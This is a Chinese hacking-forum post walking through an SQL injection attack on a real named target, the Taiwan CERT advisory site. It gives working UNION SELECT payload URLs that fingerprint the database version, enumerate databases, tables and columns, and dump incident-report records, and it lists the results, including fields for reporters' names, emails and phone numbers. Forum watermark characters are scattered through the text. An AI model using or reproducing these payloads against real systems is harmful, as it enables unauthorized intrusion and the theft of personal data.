中国网络渗透测试联盟

标题: .高级暴库方法讲解 [打印本页]

作者: admin    时间: 2012-9-13 17:57
标题: .高级暴库方法讲解
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询- T- X0 `* ?; f0 a, ]
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解1 L- f3 M/ F$ X
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--- O/ C& a) [3 z2 j
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
8 s' s& n1 L) J- N. T- h& }% N: L数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
, F8 x3 ?- d8 L- }4.判断有没有写权限* i! M( c# j# i4 ^$ G( b! f
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限- G  l3 F5 U, F: K2 s) s
没办法,手动猜表啦0 W) ~5 {4 _5 x9 l
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
" z7 r% x0 W' }, r- a: b8 e但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
6 E8 b3 m& Z+ \- F' x$ vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--/ B/ V2 e: }( M) k
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
* D& Q: ?' S: z+ J, _+ jinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb5 p. R1 n5 a' u+ y6 h
6.爆表,爆的是twcert库5 C% K: D- F% W, h
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--% _: R) B( n2 `
爆出如下表
: E8 N" Y3 _# Z6 pdownloadfile,irsys,newsdata,secrpt,secrpt_big5
& f8 x8 e! i6 x4 j7.爆列名,这次爆的是irsys表, i/ L. C% i7 L( B! i; z/ K0 d
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--/ D! w# ?3 t& Y, I
爆出如下列
  S+ F* v1 G! W, S4 Hir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
. E$ }$ H7 k8 T7 x2 Q8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。6 z0 @  U3 X. G0 h$ o: `+ R# Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
" D+ [9 r) {' n- w2 d7 m4 k返回是3,说明每个列里有3个地段
, z1 u7 X! G- Y9.爆字段内容
, ^7 b1 ~7 w$ p$ N$ hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--3 n# Z% r2 O. L2 {2 N6 z: X
爆出name列的第一个字段的内容# v9 r$ {9 y0 r
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
# c6 q2 d1 u6 p% c' `爆出name列的第二个字段的内容




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2